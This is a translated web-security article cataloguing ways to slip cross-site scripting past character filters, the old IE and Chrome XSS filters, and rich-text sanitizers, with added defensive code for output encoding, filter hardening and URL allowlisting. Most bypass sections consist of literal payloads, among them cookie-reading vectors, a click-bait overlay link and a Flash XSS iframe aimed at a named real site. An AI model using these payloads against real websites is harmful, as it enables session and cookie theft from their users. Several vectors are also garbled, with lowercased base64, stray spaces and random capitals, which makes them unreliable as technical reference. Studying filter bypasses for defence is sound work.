1.1 Bypass Char
Often a security-conscious programmer filters input to some degree. The most common approach is to filter a key symbol such as "<" or ">", which in many cases cannot prevent an attack; the more secure approach is to filter the output using the functions the programming language provides.
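To make the point above concrete, here is an added example (not code from the original article) that puts the "strip < and >" input filter next to context-aware output encoding. The helper names (stripAngleBrackets, encodeForHtmlText, encodeForHtmlAttribute, renderWithInputFilter, renderWithOutputEncoding) and the sample input are this example's own.

```javascript
// Added example, not code from the original article: context-aware output
// encoding as the alternative to filtering single characters on input.
// Function names and the sample input below are this example's own.

// The kind of input filter the text describes: drop "<" and ">" and hope.
function stripAngleBrackets(s) {
  return String(s).replace(/[<>]/g, "");
}

// Encode for HTML text content (between tags). The five characters that can
// change meaning there are replaced by character references.
function encodeForHtmlText(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Encode for a quoted HTML attribute value: everything that is not
// alphanumeric becomes a numeric reference, so quotes, spaces, "=" and "/"
// cannot close the value or start a new attribute such as onmouseover=.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => "&#" + c.codePointAt(0) + ";");
}

// Two renderers for the same template: one relies on the input filter, the
// other encodes at the output point, with the encoder chosen per context.
function renderWithInputFilter(name) {
  const n = stripAngleBrackets(name);
  return '<p title="' + n + '">' + n + " here.</p>";
}

function renderWithOutputEncoding(name) {
  return (
    '<p title="' + encodeForHtmlAttribute(name) + '">' +
    encodeForHtmlText(name) + " here.</p>"
  );
}

// Constructed sample: it contains no angle brackets, so the input filter
// passes it through, yet inside the title attribute it closes the value and
// adds an event handler. With output encoding it stays literal text.
const sample = '" onmouseover=alert(1) x="';
console.log(renderWithInputFilter(sample));
console.log(renderWithOutputEncoding(sample));
```

The attribute encoder is deliberately broad (everything non-alphanumeric) because the set of characters that matter in attribute context depends on the quoting style; encoding more than strictly necessary costs nothing and removes the need to get that analysis right.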
This section studies single-character filtering, divided into three symbols: quotes, angle brackets and parentheses.
1.1.1 Quotes
Many vectors (attack vectors) used in cross-site scripting tests do not themselves contain quotes, such as the vectors below. However, quotes are frequently needed in practice, and if they are filtered the following approaches can be used to circumvent the filter.
Vectors:
<script>alert(/insight-labs/)</script>
<iframe/onload=alert(/insight-labs/)>
<p onmouseover=alert(/insight-labs/)>insight-labs here.</p>
1) String.fromCharCode
fromCharCode can encode the quotes within the code, but it must be used together with the eval function, for example:
<script>alert('insight-labs')</script>  -->  <script>eval(String.fromCharCode(97,108,101,114,116,40,39,105,110,115,105,103,104,116,45,108,97,98,115,39,41))</script>
2) location.hash
Put the quotes in location.hash; in practice this also breaks the length limit the site imposes on the input.
<script>eval(location.hash.slice(1))</script>   #alert('a')
3) /string/.source
A string written as /string/ is a regular expression literal; .source yields the text of the regular expression, and eval(/string/.source) then executes it.
1.1.2 Angle Brackets
Usually programmers filter only the angle brackets because it is the least work, so angle-bracket filtering is the most frequently encountered in cross-site testing. In general, if the input is not output inside another tag there is basically no way to attack; but if it is output inside another tag, the surrounding tag context can be combined for the following tests:
1) Event handlers
Commonly used event handlers include onerror, onmouseover, onload, etc. (also keep an eye on the new HTML5 tags); when needed, the JavaScript event handlers can be fuzzed.
<p onmouseover=alert(/insight-labs/)>insight-labs here.</p>
<frameset onload=alert(/insight-labs/)>
<body onload=alert(/insight-labs/)>
2) style and expression
Cross-site scripting through the tag's style attribute (only succeeded in IE during testing; the filter also has to be taken into account).
<div style="width:expression(alert('insight-labs'));">
3) JavaScript pseudo-protocol
Bypass via the JavaScript pseudo-protocol.
(IE6 only)
1.1.3 Parentheses
If parentheses are filtered in the test, or parentheses cannot be injected, the following tests can be performed:
1) External files
Load an external file through src and place the code in that external file (the suffix of the external file does not have to be .js).
<script src='1.js'></script>
<script src='2.jpg'></script>
2) Hex and decimal encoding
Encode the characters using hexadecimal and decimal character references.
<div style="&#119&#105&#100&#116&#104&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#101&#114&#39&#41&#41">xsser</div>
1.2 Bypass Filter
In response to the growing problem of cross-site scripting, browser vendors have each launched their own XSS filters as part of browser security. But such filters basically only cover reflected XSS; other types of XSS are basically unaffected.
The defense mechanisms vary between browsers. For reflected XSS: Firefox basically has no defense, while IE and Chrome have their own mechanisms which are difficult to bypass; the existing bypasses are summarized here.
1.2.1 IE Filter
IE has supported the XSS Filter since IE7; its overall architecture is described in reference 1 and the regular-expression matching part in reference 2. Processing can be divided into three steps: first, IE applies heuristic filtering (regular-expression matching); if an HTTP request matches these patterns, a dynamic signature is created; and if the original content is then found in the HTTP response, it is replaced (the response is neutered). With IE fully patched, very few bypass techniques have been published; a first summary follows:
1) <a href=>
For ordinary reflected XSS, an a tag with "sc%0aript" can achieve a bypass, but it requires user interaction, so the page has to be dressed up to make the user click. The principle is that the output page and the linked page belong to the same domain, so no filtering takes place. If the address in href is a different domain, it will be filtered.
<a href="xss.php?a=<sc%0aript>alert(/insight-labs/)</script>">
<a href="xss.php?a=<sc%0aript>alert(/insight-labs/)</script>"><div style="position:absolute;left:0px;top:0px;height:1000px;width:1000px;padding:1em;background:black;text-align:center;">click to continue</div></a>
Http://vulnerabledoma.in/xssable?q =%22%3CA%20HREF%3DJAVASCRIPT%26.X3A's%3balert%26%28x28%3b1%26%29x29%3b//= %3exxx
http://vulnerabledoma.in/xssable?q= "<a href=javascript&.x3a;alert& (x28;1&) x29;//=>xxx
2) UTF-7
Inject code through a UTF-7 BOM; with a fully patched IE this only succeeds if the charset in the response header is UTF-7. See reference 3.
%2baciapga8-script%2bad4-alert%28/insight-labs/%29%2badw-%2fscript%2bad4apaai-&oe=windows-31j
3) Flash
Embed the Flash XSS file of www.A.com in an iframe on the www.B.com domain. When the victim opens www.B.com, the cookie data of www.A.com can be obtained; see reference 8.
The test code is as follows (IE):
<iframe/src= "Http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data= (function () { Location.href=%22javascript: ' <script>alert (document.cookie) </script> '%22} ' () ></iframe>
In Chrome the browser may crash; the following code can be used instead.
<iframe/src= "Http://data.house.sina.com.cn/images/price_trend/open-flash-chart.swf?get-data= (function () { Alert (Document.cookie)}) () "></iframe>
4) magic_quotes_gpc
If PHP's "magic quotes" feature (magic_quotes_gpc = On) is enabled, ' (single quote), " (double quote), \ (backslash) and NUL characters are all escaped with a backslash (%00 => \0).
Testing found that the IE XSS filter does not understand this escaping of the NUL character, i.e. it does not account for the conversion. See reference 9.
<script/%00%00v%00%00>alert(1)</script>
%C0 "; alert (%00)//
%c0 "//(%000000%0dalert (1)//
1.2.2 Chrome Filter
Chrome's XSS filtering rules differ greatly from IE's, and different Chrome versions behave differently in testing; the existing material can be found in references 4 and 5.
1) data: protocol
?vuln=<a href="javascript:alert(document.cookie);">click</a>   -- intercepted
--> converted into <a href="javascript:void(0)">click</a>
Bypass:
? vuln=<a href= "data:text/html;
base64,phnjcmlwdd5hbgvydcgnsgvsbg8gd29ybgqhjyk8l3njcmlwdd4=
">click<a>
--> OK
1.3 Bypass Rich Text
Rich text is commonly found in messages, blog posts or e-mail. Compared with a typical cross-site test it can be tested and analyzed using the existing tags. Filtering mechanisms generally come in two types, blacklist and whitelist; both are based on regular-expression matching, so during testing the input and output must be compared and the input then adjusted accordingly.
Common test process: enter common tags and events --> check whether any existing tags are left unfiltered --> mutate or analyze their attributes
Characters: javascript:, vbscript:
Events: onload, onerror, on*
1.3.1 Bypass Rules
This section categorizes some common mutation rules; in actual testing they are combined in various ways.
1) Non-recursive filtering
Many rich-text filters filter by keyword but do not filter recursively, so the result of the filtering forms a new tag, for example:
<ifra<iframe>me>   -- the filter removes <iframe> -->   <iframe>
<s<script></script>cript>   -- the filter removes <script></script> -->   <script>
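The two lines above are easiest to understand by running them through a one-pass filter. The following is an added example, not code from the original article: a single-pass keyword remover that reassembles the tag, beside two fixes (iterate to a fixed point, or reject outright). The blacklist, the function names and the samples are this example's own.

```javascript
// Added example, not code from the original article: a single-pass keyword
// filter reassembles a tag from the pieces around the removed match, and two
// ways to fix it. Function names and samples are this example's own.

// Blacklisted tags, as in the text (a real sanitizer should allowlist).
const BLOCKED_TAG = /<\/?(?:script|iframe)\b[^>]*>/i;

function removeBlockedTags(html) {
  return html.replace(new RegExp(BLOCKED_TAG.source, "gi"), "");
}

// Non-recursive filter: one pass. Removing "<iframe>" from "<ifra<iframe>me>"
// joins "<ifra" and "me>" into "<iframe>".
function stripOnce(html) {
  return removeBlockedTags(html);
}

// Fix 1: repeat until a pass changes nothing (a fixed point). The round cap
// keeps crafted input from looping for long; reaching it means reject (null).
function stripUntilStable(html, maxRounds = 10) {
  let current = html;
  for (let round = 0; round < maxRounds; round++) {
    const next = removeBlockedTags(current);
    if (next === current) return next;
    current = next;
  }
  return null;
}

// Fix 2 (preferred): do not repair, reject. Anything that matches the
// blacklist at all is refused, so there is no output to reassemble.
function rejectIfBlocked(html) {
  return BLOCKED_TAG.test(html) ? null : html;
}

// Constructed samples: the two from the text plus a benign one.
const samples = ["<ifra<iframe>me>", "<s<script></script>cript>", "<b>insight-labs</b>"];
for (const s of samples) {
  console.log(
    JSON.stringify(s), "=>",
    "once:", JSON.stringify(stripOnce(s)),
    "stable:", JSON.stringify(stripUntilStable(s)),
    "reject:", JSON.stringify(rejectIfBlocked(s))
  );
}
```

Iterating to a fixed point closes this particular hole, but it is still a blacklist operating on text; the approach that removes the whole class of problems is to parse the HTML and rebuild it from an allowlist of tags and attributes.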
2) Encoding
Bypass keywords using hexadecimal and decimal encodings of the characters. Since expression is only executed by IE, this is limited to IE.
<div style="width:expression(alert(/insight-labs/))">insight-labs</div>
<div style="width:\0065xpression(alert(/insight-labs/))">insight-labs</div>
Two different encodings at once:
<div style="width:\0065xpressio\6e(alert(/insight-labs/))">insight-labs</div>
<div style="&#119&#105&#100&#116&#104&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#101&#114&#39&#41&#41">xsser</div>
3) Special characters
In a constructed vector you can insert tabs, line breaks, other whitespace characters or "/**/" comments to bypass keyword matching; this is basically limited to IE.
Two tabs, IE6
<div style="width:exp/**
**/ression(alert(/insight-labs/))">insight-labs</div>   IE
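The encoded and comment-split style values in 1.1.3 2), 1.3.1 2) and 1.3.1 3) all reach the browser as the same string, which is why a keyword check has to canonicalise first. The following is an added example, not code from the original article: it decodes numeric character references, strips CSS comments and decodes CSS escapes in the order the browser applies them, then looks for "expression(". Function names are this example's own, and the entity vector is the one from the text written without the spaces that extraction inserted.

```javascript
// Added example, not code from the original article: canonicalise a style
// attribute value before checking it for "expression(", so that the decimal
// and hex character references, CSS "\0065" escapes and "/**/" comments from
// the text all reduce to one plain string. Function names are this example's
// own; the entity vector is the one from the text, written compactly.

// Invalid code points become U+FFFD, as browsers do, instead of throwing.
function codePointToString(cp) {
  return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\uFFFD";
}

// HTML numeric character references: decimal (&#119) or hex (&#x77), with
// the trailing ";" optional, as browsers accept.
function decodeNumericEntities(s) {
  return s.replace(/&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?/g, (m, hex, dec) =>
    codePointToString(hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10)));
}

// CSS comments are dropped by the CSS tokenizer, so "exp/**/ression" is
// "expression" to the browser.
function stripCssComments(s) {
  return s.replace(/\/\*[\s\S]*?\*\//g, "");
}

// CSS escapes: a backslash, one to six hex digits and an optional single
// whitespace that terminates the escape ("\0065" is "e", "\6e" is "n").
function decodeCssEscapes(s) {
  return s.replace(/\\([0-9a-fA-F]{1,6})\s?/g, (m, hex) =>
    codePointToString(parseInt(hex, 16)));
}

// Same order the browser applies: the HTML parser decodes references in the
// attribute value first, then the CSS tokenizer handles comments and escapes.
function canonicalizeStyle(value) {
  return decodeCssEscapes(stripCssComments(decodeNumericEntities(value))).toLowerCase();
}

function containsExpression(value) {
  return /expression\s*\(/.test(canonicalizeStyle(value));
}

// Constructed samples taken from the text, plus a benign value.
const ENTITY_VECTOR = "&#119&#105&#100&#116&#104&#58&#101&#120&#112&#114&#101&#115&#115&#105&#111&#110&#40&#97&#108&#101&#114&#116&#40&#39&#120&#115&#115&#101&#114&#39&#41&#41";
const SAMPLES = [
  "width:expression(alert(/insight-labs/))",
  "width:\\0065xpressio\\6e(alert(/insight-labs/))",
  "width:exp/**\n**/ression(alert(/insight-labs/))",
  ENTITY_VECTOR,
  "width:100px",
];
for (const s of SAMPLES) {
  console.log(containsExpression(s), JSON.stringify(canonicalizeStyle(s)));
}
```

Canonicalising before matching is the general rule for any keyword filter: whatever decoding the consumer performs, the checker has to perform at least the same decoding first, or the two will disagree on what the input means.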
4) Uncommon protocols
Using the object tag, with the data attribute holding base64-encoded data, bypasses keyword matching; the object tag is also a frequently forgotten tag.
<object data= "data:text/html;base64,phnjcmlwdd5hbgvydcgvaw5zawdodc1sywjzlyk8l3njcmlwdd4=" >
5) HTML5
Bypass using new HTML5 tags or attributes; the environment required for this kind of use is relatively demanding, see reference 6.
New tags: <button>, <video>, <audio>, <article>, <footer>, <nav>
New attributes: autocomplete, autofocus, pattern, etc.
<input onfocus=write(1) autofocus>
<video poster=javascript:alert(1)//></video>
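The javascript: and vbscript: characters listed under 1.3, the data: bypass in the Chrome section, the <object data=> vector in 4) and the <video poster=> vector just above are all the same problem: a URL-valued attribute whose scheme was blacklisted instead of allowlisted. The following is an added example, not code from the original article, of a scheme allowlist applied to URL-valued attributes. It assumes the value is seen as an HTML parser delivers it (character references already decoded); the attribute list, scheme list and function names are this example's own.

```javascript
// Added example, not code from the original article: allowlist the scheme of
// URL-valued attributes instead of blacklisting "javascript:". Assumes the
// value arrives as the HTML parser delivers it (entities already decoded).
// Attribute list, scheme list and function names are this example's own.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Attributes whose value the browser treats as a URL to fetch or navigate to.
const URL_ATTRIBUTES = new Set(["href", "src", "data", "poster", "action", "formaction"]);

// The URL parser strips leading/trailing C0 controls and spaces and removes
// tab, LF and CR anywhere, so "java\tscript:" is "javascript:" to it.
function normalizeUrl(raw) {
  return String(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Lower-case scheme of an absolute URL, or "" for a relative one.
function schemeOf(url) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(url);
  return m ? m[1].toLowerCase() : "";
}

// A relative URL inherits the page's scheme, so it is allowed; otherwise the
// scheme must be on the allowlist. Unknown schemes are rejected by default.
function isAllowedUrl(raw) {
  const scheme = schemeOf(normalizeUrl(raw));
  return scheme === "" || ALLOWED_SCHEMES.has(scheme);
}

// Decide a single attribute: non-URL attributes pass through unchanged, URL
// attributes are kept only when the scheme is allowed. null means "drop it".
function sanitizeAttribute(name, value) {
  if (!URL_ATTRIBUTES.has(name.toLowerCase())) return value;
  return isAllowedUrl(value) ? value : null;
}

// Constructed samples based on the vectors in the text, plus benign ones.
const CHECKS = [
  ["href", "javascript:alert(document.cookie);"],
  ["href", "data:text/html;base64,<payload>"],
  ["poster", "javascript:alert(1)//"],
  ["href", "  JaVaScRiPt:alert(1)"],
  ["src", "java\tscript:alert(1)"],
  ["href", "http://insight-labs.org/?p=533"],
  ["src", "/images/logo.png"],
];
for (const [n, v] of CHECKS) {
  console.log(n, JSON.stringify(v), "=>", JSON.stringify(sanitizeAttribute(n, v)));
}
```

The allowlist is what makes this hold up: a new or obscure scheme is rejected without anyone having to know about it, which is the opposite of the blacklist behaviour the Chrome data: bypass relies on.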
6) Browser parsing
This can be approached from the perspective of browser parsing; it requires in-depth analysis of how the browser parses, and several vectors of this type are given after refinement and analysis.
IE conditional comments:
<!--[if IE]><![endif]-->
<comment>   IE
1.3.2 Exploitation Techniques
In actual exploitation other problems are often encountered, such as infinite loops in the code or insufficient length; a first summary follows:
1) expression
Because the expression property is special and only supported by IE, it re-executes the eval function continuously, which is equivalent to an infinite loop; in addition the style attribute cannot contain the ";" character, so several JavaScript statements cannot be joined together. The following statement is therefore constructed:
<div style="xss:ex/**/pre/**/ssion(eval(xss));" xss="var then=new Date();then.setTime(then.getTime()+10*1000);if(document.cookie.indexOf('cookie1=')==-1){document.cookie='cookie1=ray;expires='+then.toGMTString();alert(/insight-labs/);}">
Set a cookie that expires in 10 seconds, and execute the other statements or functions inside the block guarded by this cookie check.
It can also be implemented through the window object:
<div style="width:expression((window.x==1)?'':(window.x=1,alert(/insight-labs/)))">xsser</div>
2) Length limit
This is explained in detail in the article "Breaking the XSS character limit to execute arbitrary JS code", reference 7. Browsers that support HTML5 can also make use of local storage.
References
1. http://blogs.technet.com/b/srd/archive/2008/08/18/ie-8-xss-filter-architecture-implementation.aspx
2. Abusing Internet Explorer 8's XSS filters.pdf
3. http://hi.baidu.com/thanks4sec/blog/item/1b06348ae87e2cb10df4d27c.html
4. http://evilcos.me/?p=60
5. http://hi.baidu.com/rayh4c/blog/item/c3fb8d0a6bf93422b1351ddc.html
6. http://html5sec.org/
7. http://huaidan.org/pstzine/0x03/txt/PSTZine_0x03_0x04.txt
8. http://zone.wooyun.org/content/368
9. http://insight-labs.org/?p=499
Source: http://insight-labs.org/?p=533